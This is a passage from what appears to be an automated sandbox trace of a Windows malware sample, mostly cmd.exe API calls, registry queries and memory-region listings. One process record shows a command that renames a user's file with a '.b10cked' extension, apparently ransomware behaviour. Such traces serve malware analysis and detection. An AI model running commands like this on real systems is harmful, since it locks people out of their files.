lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.717] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.718] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.719] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x32, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x32, lpOverlapped=0x0) returned 1 [0234.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.720] _close (_FileHandle=4) returned 0 [0234.720] FindNextFileW (in: hFindFile=0x4e0e90, lpFindFileData=0x30f5d4 | out: lpFindFileData=0x30f5d4) returned 0 [0234.720] GetLastError () returned 0x12 [0234.720] FindClose (in: hFindFile=0x4e0e90 | out: hFindFile=0x4e0e90) returned 1 [0234.720] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0234.721] _close (_FileHandle=3) returned 0 [0234.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.721] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.721] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.722] SetConsoleInputExeNameW () returned 0x1 [0234.722] GetConsoleOutputCP () returned 0x1b5 [0234.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.722] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.722] exit (_Code=0) Process: id = "627" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34978 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34979 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 34980 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 34981 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 34982 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34983 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34984 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34985 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34986 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 34987 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35378 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35379 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35380 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35381 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35382 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35383 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35384 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35385 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35386 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35387 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35388 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35389 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35390 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35391 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35392 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35393 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35394 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35395 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35396 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35397 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35398 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 35399 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35400 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 35401 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 867 os_tid = 0xa60 [0234.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f914 | out: lpSystemTimeAsFileTime=0x12f914*(dwLowDateTime=0xbf8600e0, dwHighDateTime=0x1d440a9)) [0234.980] GetCurrentProcessId () returned 0x990 [0234.980] GetCurrentThreadId () returned 0xa60 [0234.980] GetTickCount () returned 0x40868 [0234.980] QueryPerformanceCounter (in: lpPerformanceCount=0x12f90c | out: lpPerformanceCount=0x12f90c*=29176898564) returned 1 [0234.980] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.980] __set_app_type (_Type=0x1) [0234.980] __p__fmode () returned 0x76b331f4 [0234.980] __p__commode () returned 0x76b331fc [0234.980] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.981] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.981] GetCurrentThreadId () returned 0xa60 [0234.981] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa60) returned 0x38 [0234.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.981] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.981] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.981] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.981] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8a4 | out: phkResult=0x12f8a4*=0x0) returned 0x2 [0234.981] VirtualQuery (in: lpAddress=0x12f8db, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.981] GetConsoleOutputCP () returned 0x1b5 [0234.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.982] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.982] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.982] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.982] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.982] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.982] GetEnvironmentStringsW () returned 0x190208* [0234.983] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.983] GetEnvironmentStringsW () returned 0x190208* [0234.983] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.983] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e814 | out: phkResult=0x12e814*=0x40) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x98, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x0, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegCloseKey (hKey=0x40) returned 0x0 [0234.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e814 | out: phkResult=0x12e814*=0x40) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x0, 